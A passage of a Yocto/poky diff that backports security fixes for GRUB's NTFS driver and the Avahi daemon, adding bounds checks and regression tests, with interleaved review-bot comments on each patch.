diff --git a/poky/meta/recipes-bsp/grub/files/CVE-2023-4692.patch b/poky/meta/recipes-bsp/grub/files/CVE-2023-4692.patch
new file mode 100644
index 0000000000..4780e35b7a
--- /dev/null
+++ b/poky/meta/recipes-bsp/grub/files/CVE-2023-4692.patch
@@ -0,0 +1,97 @@
+From 43651027d24e62a7a463254165e1e46e42aecdea Mon Sep 17 00:00:00 2001
+From: Maxim Suhanov <dfirblog@gmail.com>
+Date: Thu, 16 Nov 2023 07:21:50 +0000
+Subject: [PATCH] fs/ntfs: Fix an OOB write when parsing the $ATTRIBUTE_LIST
+ attribute for the $MFT file
+
+When parsing an extremely fragmented $MFT file, i.e., the file described
+using the $ATTRIBUTE_LIST attribute, current NTFS code will reuse a buffer
+containing bytes read from the underlying drive to store sector numbers,
+which are consumed later to read data from these sectors into another buffer.
+
+These sectors numbers, two 32-bit integers, are always stored at predefined
+offsets, 0x10 and 0x14, relative to first byte of the selected entry within
+the $ATTRIBUTE_LIST attribute. Usually, this won't cause any problem.
+
+However, when parsing a specially-crafted file system image, this may cause
+the NTFS code to write these integers beyond the buffer boundary, likely
+causing the GRUB memory allocator to misbehave or fail. These integers contain
+values which are controlled by on-disk structures of the NTFS file system.
+
+Such modification and resulting misbehavior may touch a memory range not
+assigned to the GRUB and owned by firmware or another EFI application/driver.
+
+This fix introduces checks to ensure that these sector numbers are never
+written beyond the boundary.
+
+Fixes: CVE-2023-4692
+
+Reported-by: Maxim Suhanov <dfirblog@gmail.com>
+Signed-off-by: Maxim Suhanov <dfirblog@gmail.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+CVE: CVE-2023-4692
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=43651027d24e62a7a463254165e1e46e42aecdea]
+
+Signed-off-by: Yogita Urade <yogita.urade@windriver.com>
+---
+ grub-core/fs/ntfs.c | 18 +++++++++++++++++-
+ 1 file changed, 17 insertions(+), 1 deletion(-)
+
+diff --git a/grub-core/fs/ntfs.c b/grub-core/fs/ntfs.c
+index 2f34f76..6009e49 100644
+--- a/grub-core/fs/ntfs.c
++++ b/grub-core/fs/ntfs.c
+@@ -184,7 +184,7 @@ find_attr (struct grub_ntfs_attr *at, grub_uint8_t attr)
+ }
+ if (at->attr_end)
+ {
+- grub_uint8_t *pa;
++ grub_uint8_t *pa, *pa_end;
+
+ at->emft_buf = grub_malloc (at->mft->data->mft_size << GRUB_NTFS_BLK_SHR);
+ if (at->emft_buf == NULL)
+@@ -209,11 +209,13 @@ find_attr (struct grub_ntfs_attr *at, grub_uint8_t attr)
+ }
+ at->attr_nxt = at->edat_buf;
+ at->attr_end = at->edat_buf + u32at (pa, 0x30);
++ pa_end = at->edat_buf + n;
+ }
+ else
+ {
+ at->attr_nxt = at->attr_end + u16at (pa, 0x14);
+ at->attr_end = at->attr_end + u32at (pa, 4);
++ pa_end = at->mft->buf + (at->mft->data->mft_size << GRUB_NTFS_BLK_SHR);
+ }
+ at->flags |= GRUB_NTFS_AF_ALST;
+ while (at->attr_nxt < at->attr_end)
+@@ -230,6 +232,13 @@ find_attr (struct grub_ntfs_attr *at, grub_uint8_t attr)
+ at->flags |= GRUB_NTFS_AF_GPOS;
+ at->attr_cur = at->attr_nxt;
+ pa = at->attr_cur;
++
++ if ((pa >= pa_end) || (pa_end - pa < 0x18))
++ {
++ grub_error (GRUB_ERR_BAD_FS, "can\'t parse attribute list");
++ return NULL;
++ }
++
+ grub_set_unaligned32 ((char *) pa + 0x10,
+ grub_cpu_to_le32 (at->mft->data->mft_start));
+ grub_set_unaligned32 ((char *) pa + 0x14,
+@@ -240,6 +249,13 @@ find_attr (struct grub_ntfs_attr *at, grub_uint8_t attr)
+ {
+ if (*pa != attr)
+ break;
++
++ if ((pa >= pa_end) || (pa_end - pa < 0x18))
++ {
++ grub_error (GRUB_ERR_BAD_FS, "can\'t parse attribute list");
++ return NULL;
++ }
++
+ if (read_attr
+ (at, pa + 0x10,
+ u32at (pa, 0x10) * (at->mft->data->mft_size << GRUB_NTFS_BLK_SHR),
+--
+2.40.0
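Review bot: in the first branch pa_end is set to at->edat_buf + n, and n is defined outside the visible hunks, so the backport should be checked against this tree's ntfs.c to confirm n is the number of bytes actually read into edat_buf at that point; otherwise the new `(pa >= pa_end) || (pa_end - pa < 0x18)` guard bounds against the wrong length. The 0x18 limit matches the two 32-bit fields at 0x10 and 0x14 described in the commit message. The `\'` escape in "can\'t parse attribute list" is unnecessary inside a double-quoted C string, but should stay as upstream for a verbatim backport.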
diff --git a/poky/meta/recipes-bsp/grub/files/CVE-2023-4693.patch b/poky/meta/recipes-bsp/grub/files/CVE-2023-4693.patch
new file mode 100644
index 0000000000..1b6013d86d
--- /dev/null
+++ b/poky/meta/recipes-bsp/grub/files/CVE-2023-4693.patch
@@ -0,0 +1,62 @@
+From 0ed2458cc4eff6d9a9199527e2a0b6d445802f94 Mon Sep 17 00:00:00 2001
+From: Maxim Suhanov <dfirblog@gmail.com>
+Date: Mon, 28 Aug 2023 16:32:33 +0300
+Subject: [PATCH] fs/ntfs: Fix an OOB read when reading data from the resident
+ $DATA attribute
+
+When reading a file containing resident data, i.e., the file data is stored in
+the $DATA attribute within the NTFS file record, not in external clusters,
+there are no checks that this resident data actually fits the corresponding
+file record segment.
+
+When parsing a specially-crafted file system image, the current NTFS code will
+read the file data from an arbitrary, attacker-chosen memory offset and of
+arbitrary, attacker-chosen length.
+
+This allows an attacker to display arbitrary chunks of memory, which could
+contain sensitive information like password hashes or even plain-text,
+obfuscated passwords from BS EFI variables.
+
+This fix implements a check to ensure that resident data is read from the
+corresponding file record segment only.
+
+Fixes: CVE-2023-4693
+
+Reported-by: Maxim Suhanov <dfirblog@gmail.com>
+Signed-off-by: Maxim Suhanov <dfirblog@gmail.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/gitweb/?p=grub.git;a=commit;h=0ed2458cc4eff6d9a9199527e2a0b6d445802f94]
+CVE: CVE-2023-4693
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ grub-core/fs/ntfs.c | 13 ++++++++++++-
+ 1 file changed, 12 insertions(+), 1 deletion(-)
+
+diff --git a/grub-core/fs/ntfs.c b/grub-core/fs/ntfs.c
+index 7e43fd6..8f63c83 100644
+--- a/grub-core/fs/ntfs.c
++++ b/grub-core/fs/ntfs.c
+@@ -401,7 +401,18 @@ read_data (struct grub_ntfs_attr *at, grub_uint8_t *pa, grub_uint8_t *dest,
+ {
+ if (ofs + len > u32at (pa, 0x10))
+ return grub_error (GRUB_ERR_BAD_FS, "read out of range");
+- grub_memcpy (dest, pa + u32at (pa, 0x14) + ofs, len);
++
++ if (u32at (pa, 0x10) > (at->mft->data->mft_size << GRUB_NTFS_BLK_SHR))
++ return grub_error (GRUB_ERR_BAD_FS, "resident attribute too large");
++
++ if (pa >= at->mft->buf + (at->mft->data->mft_size << GRUB_NTFS_BLK_SHR))
++ return grub_error (GRUB_ERR_BAD_FS, "resident attribute out of range");
++
++ if (u16at (pa, 0x14) + u32at (pa, 0x10) >
++ (grub_addr_t) at->mft->buf + (at->mft->data->mft_size << GRUB_NTFS_BLK_SHR) - (grub_addr_t) pa)
++ return grub_error (GRUB_ERR_BAD_FS, "resident attribute out of range");
++
++ grub_memcpy (dest, pa + u16at (pa, 0x14) + ofs, len);
+ return 0;
+ }
+
+--
+2.25.1
+
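Review bot: the copy switches from u32at (pa, 0x14) to u16at (pa, 0x14) for the resident data offset, and the commit message does not mention it; the header should say so, since it changes which bytes are interpreted as the offset. The third check is only safe because the first added check has already bounded u32at (pa, 0x10) by the record size (so the sum cannot wrap) and the second has established that pa is below the end of at->mft->buf (so the subtraction is not negative); a comment stating that ordering would keep a later reorder from reintroducing the bug. There is no matching lower-bound test that pa >= at->mft->buf, and the patch file ends with an extra blank line.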
diff --git a/poky/meta/recipes-bsp/grub/grub2.inc b/poky/meta/recipes-bsp/grub/grub2.inc
index 41839698dc..f594e7d3a4 100644
--- a/poky/meta/recipes-bsp/grub/grub2.inc
+++ b/poky/meta/recipes-bsp/grub/grub2.inc
@@ -42,6 +42,8 @@ SRC_URI = "${GNU_MIRROR}/grub/grub-${PV}.tar.gz \
file://CVE-2022-3775.patch \
file://0001-risc-v-Handle-R_RISCV_CALL_PLT-reloc.patch \
file://0001-fs-ext2-Ignore-checksum-seed-incompat-feature.patch \
+ file://CVE-2023-4692.patch \
+ file://CVE-2023-4693.patch \
"
SRC_URI[sha256sum] = "23b64b4c741569f9426ed2e3d0e6780796fca081bee4c99f62aa3f53ae803f5f"
diff --git a/poky/meta/recipes-connectivity/avahi/avahi_0.8.bb b/poky/meta/recipes-connectivity/avahi/avahi_0.8.bb
index 4c830cc058..bfd945c7ae 100644
--- a/poky/meta/recipes-connectivity/avahi/avahi_0.8.bb
+++ b/poky/meta/recipes-connectivity/avahi/avahi_0.8.bb
@@ -26,6 +26,15 @@ SRC_URI = "${GITHUB_BASE_URI}/download/v${PV}/avahi-${PV}.tar.gz \
file://handle-hup.patch \
file://local-ping.patch \
file://invalid-service.patch \
+ file://CVE-2023-1981.patch \
+ file://CVE-2023-38469-1.patch \
+ file://CVE-2023-38469-2.patch \
+ file://CVE-2023-38470-1.patch \
+ file://CVE-2023-38470-2.patch \
+ file://CVE-2023-38471-1.patch \
+ file://CVE-2023-38471-2.patch \
+ file://CVE-2023-38472.patch \
+ file://CVE-2023-38473.patch \
"
GITHUB_BASE_URI = "https://github.com/lathiat/avahi/releases/"
diff --git a/poky/meta/recipes-connectivity/avahi/files/CVE-2023-1981.patch b/poky/meta/recipes-connectivity/avahi/files/CVE-2023-1981.patch
new file mode 100644
index 0000000000..4d7924d13a
--- /dev/null
+++ b/poky/meta/recipes-connectivity/avahi/files/CVE-2023-1981.patch
@@ -0,0 +1,58 @@
+From a2696da2f2c50ac43b6c4903f72290d5c3fa9f6f Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Petr=20Men=C5=A1=C3=ADk?= <pemensik@redhat.com>
+Date: Thu, 17 Nov 2022 01:51:53 +0100
+Subject: [PATCH] Emit error if requested service is not found
+
+It currently just crashes instead of replying with error. Check return
+value and emit error instead of passing NULL pointer to reply.
+
+Fixes #375
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/avahi/tree/debian/patches/CVE-2023-1981.patch?h=ubuntu/jammy-security
+Upstream commit https://github.com/lathiat/avahi/commit/a2696da2f2c50ac43b6c4903f72290d5c3fa9f6f]
+CVE: CVE-2023-1981
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ avahi-daemon/dbus-protocol.c | 20 ++++++++++++++------
+ 1 file changed, 14 insertions(+), 6 deletions(-)
+
+diff --git a/avahi-daemon/dbus-protocol.c b/avahi-daemon/dbus-protocol.c
+index 70d7687bc..406d0b441 100644
+--- a/avahi-daemon/dbus-protocol.c
++++ b/avahi-daemon/dbus-protocol.c
+@@ -375,10 +375,14 @@ static DBusHandlerResult dbus_get_alternative_host_name(DBusConnection *c, DBusM
+ }
+
+ t = avahi_alternative_host_name(n);
+- avahi_dbus_respond_string(c, m, t);
+- avahi_free(t);
++ if (t) {
++ avahi_dbus_respond_string(c, m, t);
++ avahi_free(t);
+
+- return DBUS_HANDLER_RESULT_HANDLED;
++ return DBUS_HANDLER_RESULT_HANDLED;
++ } else {
++ return avahi_dbus_respond_error(c, m, AVAHI_ERR_NOT_FOUND, "Hostname not found");
++ }
+ }
+
+ static DBusHandlerResult dbus_get_alternative_service_name(DBusConnection *c, DBusMessage *m, DBusError *error) {
+@@ -389,10 +393,14 @@ static DBusHandlerResult dbus_get_alternative_service_name(DBusConnection *c, DB
+ }
+
+ t = avahi_alternative_service_name(n);
+- avahi_dbus_respond_string(c, m, t);
+- avahi_free(t);
++ if (t) {
++ avahi_dbus_respond_string(c, m, t);
++ avahi_free(t);
+
+- return DBUS_HANDLER_RESULT_HANDLED;
++ return DBUS_HANDLER_RESULT_HANDLED;
++ } else {
++ return avahi_dbus_respond_error(c, m, AVAHI_ERR_NOT_FOUND, "Service not found");
++ }
+ }
+
+ static DBusHandlerResult dbus_create_new_entry_group(DBusConnection *c, DBusMessage *m, DBusError *error) {
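Review bot: the Upstream-Status tag in the patch header is split over two lines, with the opening bracket on the "import from ubuntu" line and the closing bracket after the upstream commit URL, so a line-based check sees an unterminated `Backport [` entry. Put the upstream commit URL inside the brackets on a single line and mention the Ubuntu import in a separate sentence; the same layout is used in the CVE-2023-38469 patches that follow.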
diff --git a/poky/meta/recipes-connectivity/avahi/files/CVE-2023-38469-1.patch b/poky/meta/recipes-connectivity/avahi/files/CVE-2023-38469-1.patch
new file mode 100644
index 0000000000..85345edc10
--- /dev/null
+++ b/poky/meta/recipes-connectivity/avahi/files/CVE-2023-38469-1.patch
@@ -0,0 +1,48 @@
+From a337a1ba7d15853fb56deef1f464529af6e3a1cf Mon Sep 17 00:00:00 2001
+From: Evgeny Vereshchagin <evvers@ya.ru>
+Date: Mon, 23 Oct 2023 20:29:31 +0000
+Subject: [PATCH] core: reject overly long TXT resource records
+
+Closes https://github.com/lathiat/avahi/issues/455
+
+CVE-2023-38469
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/avahi/tree/debian/patches/CVE-2023-38469-1.patch?h=ubuntu/jammy-security
+Upstream commit https://github.com/lathiat/avahi/commit/a337a1ba7d15853fb56deef1f464529af6e3a1cf]
+CVE: CVE-2023-38469
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ avahi-core/rr.c | 9 ++++++++-
+ 1 file changed, 8 insertions(+), 1 deletion(-)
+
+Index: avahi-0.8/avahi-core/rr.c
+===================================================================
+--- avahi-0.8.orig/avahi-core/rr.c
++++ avahi-0.8/avahi-core/rr.c
+@@ -32,6 +32,7 @@
+ #include <avahi-common/malloc.h>
+ #include <avahi-common/defs.h>
+
++#include "dns.h"
+ #include "rr.h"
+ #include "log.h"
+ #include "util.h"
+@@ -688,11 +689,17 @@ int avahi_record_is_valid(AvahiRecord *r
+ case AVAHI_DNS_TYPE_TXT: {
+
+ AvahiStringList *strlst;
++ size_t used = 0;
+
+- for (strlst = r->data.txt.string_list; strlst; strlst = strlst->next)
++ for (strlst = r->data.txt.string_list; strlst; strlst = strlst->next) {
+ if (strlst->size > 255 || strlst->size <= 0)
+ return 0;
+
++ used += 1+strlst->size;
++ if (used > AVAHI_DNS_RDATA_MAX)
++ return 0;
++ }
++
+ return 1;
+ }
+ }
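Review bot: `used += 1+strlst->size;` has no comment explaining the extra 1, which is the length octet that precedes each TXT string in the record data; without it the comparison against AVAHI_DNS_RDATA_MAX reads as an off-by-one. Since this is a backport the code should stay as upstream, so note it in the patch header. The header also carries a bare "CVE-2023-38469" line in addition to the `CVE:` tag, which is redundant.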
diff --git a/poky/meta/recipes-connectivity/avahi/files/CVE-2023-38469-2.patch b/poky/meta/recipes-connectivity/avahi/files/CVE-2023-38469-2.patch
new file mode 100644
index 0000000000..f8f60ddca1
--- /dev/null
+++ b/poky/meta/recipes-connectivity/avahi/files/CVE-2023-38469-2.patch
@@ -0,0 +1,65 @@
+From c6cab87df290448a63323c8ca759baa516166237 Mon Sep 17 00:00:00 2001
+From: Evgeny Vereshchagin <evvers@ya.ru>
+Date: Wed, 25 Oct 2023 18:15:42 +0000
+Subject: [PATCH] tests: pass overly long TXT resource records
+
+to make sure they don't crash avahi any more.
+It reproduces https://github.com/lathiat/avahi/issues/455
+
+Canonical notes:
+nickgalanis> removed first hunk since there is no .github dir in this release
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/avahi/tree/debian/patches/CVE-2023-38469-2.patch?h=ubuntu/jammy-security
+Upstream commit https://github.com/lathiat/avahi/commit/c6cab87df290448a63323c8ca759baa516166237]
+CVE: CVE-2023-38469
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ avahi-client/client-test.c | 14 ++++++++++++++
+ 1 files changed, 14 insertions(+)
+
+Index: avahi-0.8/avahi-client/client-test.c
+===================================================================
+--- avahi-0.8.orig/avahi-client/client-test.c
++++ avahi-0.8/avahi-client/client-test.c
+@@ -22,6 +22,7 @@
+ #endif
+
+ #include <stdio.h>
++#include <string.h>
+ #include <assert.h>
+
+ #include <avahi-client/client.h>
+@@ -33,6 +34,8 @@
+ #include <avahi-common/malloc.h>
+ #include <avahi-common/timeval.h>
+
++#include <avahi-core/dns.h>
++
+ static const AvahiPoll *poll_api = NULL;
+ static AvahiSimplePoll *simple_poll = NULL;
+
+@@ -222,6 +225,9 @@ int main (AVAHI_GCC_UNUSED int argc, AVA
+ uint32_t cookie;
+ struct timeval tv;
+ AvahiAddress a;
++ uint8_t rdata[AVAHI_DNS_RDATA_MAX+1];
++ AvahiStringList *txt = NULL;
++ int r;
+
+ simple_poll = avahi_simple_poll_new();
+ poll_api = avahi_simple_poll_get(simple_poll);
+@@ -258,6 +264,14 @@ int main (AVAHI_GCC_UNUSED int argc, AVA
+ printf("%s\n", avahi_strerror(avahi_entry_group_add_service (group, AVAHI_IF_UNSPEC, AVAHI_PROTO_UNSPEC, 0, "Lathiat's Site", "_http._tcp", NULL, NULL, 80, "foo=bar", NULL)));
+ printf("add_record: %d\n", avahi_entry_group_add_record (group, AVAHI_IF_UNSPEC, AVAHI_PROTO_UNSPEC, 0, "TestX", 0x01, 0x10, 120, "\5booya", 6));
+
++ memset(rdata, 1, sizeof(rdata));
++ r = avahi_string_list_parse(rdata, sizeof(rdata), &txt);
++ assert(r >= 0);
++ assert(avahi_string_list_serialize(txt, NULL, 0) == sizeof(rdata));
++ error = avahi_entry_group_add_service_strlst(group, AVAHI_IF_UNSPEC, AVAHI_PROTO_UNSPEC, 0, "TestX", "_qotd._tcp", NULL, NULL, 123, txt);
++ assert(error == AVAHI_ERR_INVALID_RECORD);
++ avahi_string_list_free(txt);
++
+ avahi_entry_group_commit (group);
+
+ domain = avahi_domain_browser_new (avahi, AVAHI_IF_UNSPEC, AVAHI_PROTO_UNSPEC, NULL, AVAHI_DOMAIN_BROWSER_BROWSE, 0, avahi_domain_browser_callback, (char*) "omghai3u");
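Review bot: every check added to `main()` in `client-test.c` is an `assert()`, so a build with `NDEBUG` compiles them out. In that case `r` is set but never used and the `AVAHI_ERR_INVALID_RECORD` result of `avahi_entry_group_add_service_strlst()` is never verified. Either use explicit `if` checks that fail the test, or make sure this test is never built with `NDEBUG`. The client test also includes the internal `<avahi-core/dns.h>` only to get `AVAHI_DNS_RDATA_MAX`; a short comment saying so would help the next reader.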
diff --git a/poky/meta/recipes-connectivity/avahi/files/CVE-2023-38470-1.patch b/poky/meta/recipes-connectivity/avahi/files/CVE-2023-38470-1.patch
new file mode 100644
index 0000000000..4cca81698b
--- /dev/null
+++ b/poky/meta/recipes-connectivity/avahi/files/CVE-2023-38470-1.patch
@@ -0,0 +1,57 @@
+From 94cb6489114636940ac683515417990b55b5d66c Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Petr=20Men=C5=A1=C3=ADk?= <pemensik@redhat.com>
+Date: Tue, 11 Apr 2023 15:29:59 +0200
+Subject: [PATCH] Ensure each label is at least one byte long
+
+The only allowed exception is single dot, where it should return empty
+string.
+
+Fixes #454.
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/avahi/tree/debian/patches/CVE-2023-38470-1.patch?h=ubuntu/jammy-security
+Upstream commit https://github.com/lathiat/avahi/commit/94cb6489114636940ac683515417990b55b5d66c]
+CVE: CVE-2023-38470
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ avahi-common/domain-test.c | 14 ++++++++++++++
+ avahi-common/domain.c | 2 +-
+ 2 files changed, 15 insertions(+), 1 deletion(-)
+
+Index: avahi-0.8/avahi-common/domain-test.c
+===================================================================
+--- avahi-0.8.orig/avahi-common/domain-test.c
++++ avahi-0.8/avahi-common/domain-test.c
+@@ -45,6 +45,20 @@ int main(AVAHI_GCC_UNUSED int argc, AVAH
+ printf("%s\n", s = avahi_normalize_name_strdup("fo\\\\o\\..f oo."));
+ avahi_free(s);
+
++ printf("%s\n", s = avahi_normalize_name_strdup("."));
++ avahi_free(s);
++
++ s = avahi_normalize_name_strdup(",.=.}.=.?-.}.=.?.?.}.}.?.?.?.z.?.?.}.}."
++ "}.?.?.?.r.=.=.}.=.?.}}.}.?.?.?.zM.=.=.?.?.}.}.?.?.}.}.}"
++ ".?.?.?.r.=.=.}.=.?.}}.}.?.?.?.zM.=.=.?.?.}.}.?.?.?.zM.?`"
++ "?.}.}.}.?.?.?.r.=.?.}.=.?.?.}.?.?.?.}.=.?.?.}??.}.}.?.?."
++ "?.z.?.?.}.}.}.?.?.?.r.=.=.}.=.?.}}.}.?.?.?.zM.?`?.}.}.}."
++ "??.?.zM.?`?.}.}.}.?.?.?.r.=.?.}.=.?.?.}.?.?.?.}.=.?.?.}?"
++ "?.}.}.?.?.?.z.?.?.}.}.}.?.?.?.r.=.=.}.=.?.}}.}.?.?.?.zM."
++ "?`?.}.}.}.?.?.?.r.=.=.?.?`.?.?}.}.}.?.?.?.r.=.?.}.=.?.?."
++ "}.?.?.?.}.=.?.?.}");
++ assert(s == NULL);
++
+ printf("%i\n", avahi_domain_equal("\\065aa bbb\\.\\046cc.cc\\\\.dee.fff.", "Aaa BBB\\.\\.cc.cc\\\\.dee.fff"));
+ printf("%i\n", avahi_domain_equal("A", "a"));
+
+Index: avahi-0.8/avahi-common/domain.c
+===================================================================
+--- avahi-0.8.orig/avahi-common/domain.c
++++ avahi-0.8/avahi-common/domain.c
+@@ -201,7 +201,7 @@ char *avahi_normalize_name(const char *s
+ }
+
+ if (!empty) {
+- if (size < 1)
++ if (size < 2)
+ return NULL;
+
+ *(r++) = '.';
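Review bot: in the `domain-test.c` hunk the new `"."` case is only printed, never asserted, although the commit message says a single dot must return an empty string. The `printf("%s\n", s = ...)` form would also pass NULL to `%s` if normalization failed. Assign first, then `assert(s && !*s);` before printing. In the `domain.c` hunk, the change from `size < 1` to `size < 2` deserves a comment stating what the two bytes are for, since the reason is only given in the commit subject.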
diff --git a/poky/meta/recipes-connectivity/avahi/files/CVE-2023-38470-2.patch b/poky/meta/recipes-connectivity/avahi/files/CVE-2023-38470-2.patch
new file mode 100644
index 0000000000..e0736bf210
--- /dev/null
+++ b/poky/meta/recipes-connectivity/avahi/files/CVE-2023-38470-2.patch
@@ -0,0 +1,52 @@
+From 20dec84b2480821704258bc908e7b2bd2e883b24 Mon Sep 17 00:00:00 2001
+From: Evgeny Vereshchagin <evvers@ya.ru>
+Date: Tue, 19 Sep 2023 03:21:25 +0000
+Subject: [PATCH] [common] bail out when escaped labels can't fit into ret
+
+Fixes:
+```
+==93410==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7f9e76f14c16 at pc 0x00000047208d bp 0x7ffee90a6a00 sp 0x7ffee90a61c8
+READ of size 1110 at 0x7f9e76f14c16 thread T0
+ #0 0x47208c in __interceptor_strlen (out/fuzz-domain+0x47208c) (BuildId: 731b20c1eef22c2104e75a6496a399b10cfc7cba)
+ #1 0x534eb0 in avahi_strdup avahi/avahi-common/malloc.c:167:12
+ #2 0x53862c in avahi_normalize_name_strdup avahi/avahi-common/domain.c:226:12
+```
+and
+```
+fuzz-domain: fuzz/fuzz-domain.c:38: int LLVMFuzzerTestOneInput(const uint8_t *, size_t): Assertion `avahi_domain_equal(s, t)' failed.
+==101571== ERROR: libFuzzer: deadly signal
+ #0 0x501175 in __sanitizer_print_stack_trace (/home/vagrant/avahi/out/fuzz-domain+0x501175) (BuildId: 682bf6400aff9d41b64b6e2cc3ef5ad600216ea8)
+ #1 0x45ad2c in fuzzer::PrintStackTrace() (/home/vagrant/avahi/out/fuzz-domain+0x45ad2c) (BuildId: 682bf6400aff9d41b64b6e2cc3ef5ad600216ea8)
+ #2 0x43fc07 in fuzzer::Fuzzer::CrashCallback() (/home/vagrant/avahi/out/fuzz-domain+0x43fc07) (BuildId: 682bf6400aff9d41b64b6e2cc3ef5ad600216ea8)
+ #3 0x7f1581d7ebaf (/lib64/libc.so.6+0x3dbaf) (BuildId: c9f62793b9e886eb1b95077d4f26fe2b4aa1ac25)
+ #4 0x7f1581dcf883 in __pthread_kill_implementation (/lib64/libc.so.6+0x8e883) (BuildId: c9f62793b9e886eb1b95077d4f26fe2b4aa1ac25)
+ #5 0x7f1581d7eafd in gsignal (/lib64/libc.so.6+0x3dafd) (BuildId: c9f62793b9e886eb1b95077d4f26fe2b4aa1ac25)
+ #6 0x7f1581d6787e in abort (/lib64/libc.so.6+0x2687e) (BuildId: c9f62793b9e886eb1b95077d4f26fe2b4aa1ac25)
+ #7 0x7f1581d6779a in __assert_fail_base.cold (/lib64/libc.so.6+0x2679a) (BuildId: c9f62793b9e886eb1b95077d4f26fe2b4aa1ac25)
+ #8 0x7f1581d77186 in __assert_fail (/lib64/libc.so.6+0x36186) (BuildId: c9f62793b9e886eb1b95077d4f26fe2b4aa1ac25)
+ #9 0x5344a4 in LLVMFuzzerTestOneInput /home/vagrant/avahi/fuzz/fuzz-domain.c:38:9
+```
+
+It's a follow-up to 94cb6489114636940ac683515417990b55b5d66c
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/avahi/tree/debian/patches/CVE-2023-38470-2.patch?h=ubuntu/jammy-security
+CVE: CVE-2023-38470 #Follow-up patch
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ avahi-common/domain.c | 3 ++-
+ 1 file changed, 2 insertions(+), 1 deletion(-)
+
+Index: avahi-0.8/avahi-common/domain.c
+===================================================================
+--- avahi-0.8.orig/avahi-common/domain.c
++++ avahi-0.8/avahi-common/domain.c
+@@ -210,7 +210,8 @@ char *avahi_normalize_name(const char *s
+ } else
+ empty = 0;
+
+- avahi_escape_label(label, strlen(label), &r, &size);
++ if (!(avahi_escape_label(label, strlen(label), &r, &size)))
++ return NULL;
+ }
+
+ return ret_s;
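Review bot: the `Upstream-Status:` tag in this patch header opens a `[` that is never closed and, unlike the other avahi patches in this series, carries no upstream commit reference. Add the reference for 20dec84b2480821704258bc908e7b2bd2e883b24 and close the bracket before the `CVE:` line. In the `domain.c` hunk the outer parentheses in `if (!(avahi_escape_label(...)))` are redundant.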
diff --git a/poky/meta/recipes-connectivity/avahi/files/CVE-2023-38471-1.patch b/poky/meta/recipes-connectivity/avahi/files/CVE-2023-38471-1.patch
new file mode 100644
index 0000000000..07cd3246e8
--- /dev/null
+++ b/poky/meta/recipes-connectivity/avahi/files/CVE-2023-38471-1.patch
@@ -0,0 +1,73 @@
+From 894f085f402e023a98cbb6f5a3d117bd88d93b09 Mon Sep 17 00:00:00 2001
+From: Michal Sekletar <msekleta@redhat.com>
+Date: Mon, 23 Oct 2023 13:38:35 +0200
+Subject: [PATCH] core: extract host name using avahi_unescape_label()
+
+Previously we could create invalid escape sequence when we split the
+string on dot. For example, from valid host name "foo\\.bar" we have
+created invalid name "foo\\" and tried to set that as the host name
+which crashed the daemon.
+
+Fixes #453
+
+CVE-2023-38471
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/avahi/tree/debian/patches/CVE-2023-38471-1.patch?h=ubuntu/jammy-security
+Upstream commit https://github.com/lathiat/avahi/commit/894f085f402e023a98cbb6f5a3d117bd88d93b09]
+CVE: CVE-2023-38471
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ avahi-core/server.c | 27 +++++++++++++++++++++------
+ 1 file changed, 21 insertions(+), 6 deletions(-)
+
+Index: avahi-0.8/avahi-core/server.c
+===================================================================
+--- avahi-0.8.orig/avahi-core/server.c
++++ avahi-0.8/avahi-core/server.c
+@@ -1295,7 +1295,11 @@ static void update_fqdn(AvahiServer *s)
+ }
+
+ int avahi_server_set_host_name(AvahiServer *s, const char *host_name) {
+- char *hn = NULL;
++ char label_escaped[AVAHI_LABEL_MAX*4+1];
++ char label[AVAHI_LABEL_MAX];
++ char *hn = NULL, *h;
++ size_t len;
++
+ assert(s);
+
+ AVAHI_CHECK_VALIDITY(s, !host_name || avahi_is_valid_host_name(host_name), AVAHI_ERR_INVALID_HOST_NAME);
+@@ -1305,17 +1309,28 @@ int avahi_server_set_host_name(AvahiServ
+ else
+ hn = avahi_normalize_name_strdup(host_name);
+
+- hn[strcspn(hn, ".")] = 0;
++ h = hn;
++ if (!avahi_unescape_label((const char **)&hn, label, sizeof(label))) {
++ avahi_free(h);
++ return AVAHI_ERR_INVALID_HOST_NAME;
++ }
++
++ avahi_free(h);
+
+- if (avahi_domain_equal(s->host_name, hn) && s->state != AVAHI_SERVER_COLLISION) {
+- avahi_free(hn);
++ h = label_escaped;
++ len = sizeof(label_escaped);
++ if (!avahi_escape_label(label, strlen(label), &h, &len))
++ return AVAHI_ERR_INVALID_HOST_NAME;
++
++ if (avahi_domain_equal(s->host_name, label_escaped) && s->state != AVAHI_SERVER_COLLISION)
+ return avahi_server_set_errno(s, AVAHI_ERR_NO_CHANGE);
+- }
+
+ withdraw_host_rrs(s);
+
+ avahi_free(s->host_name);
+- s->host_name = hn;
++ s->host_name = avahi_strdup(label_escaped);
++ if (!s->host_name)
++ return AVAHI_ERR_NO_MEMORY;
+
+ update_fqdn(s);
+
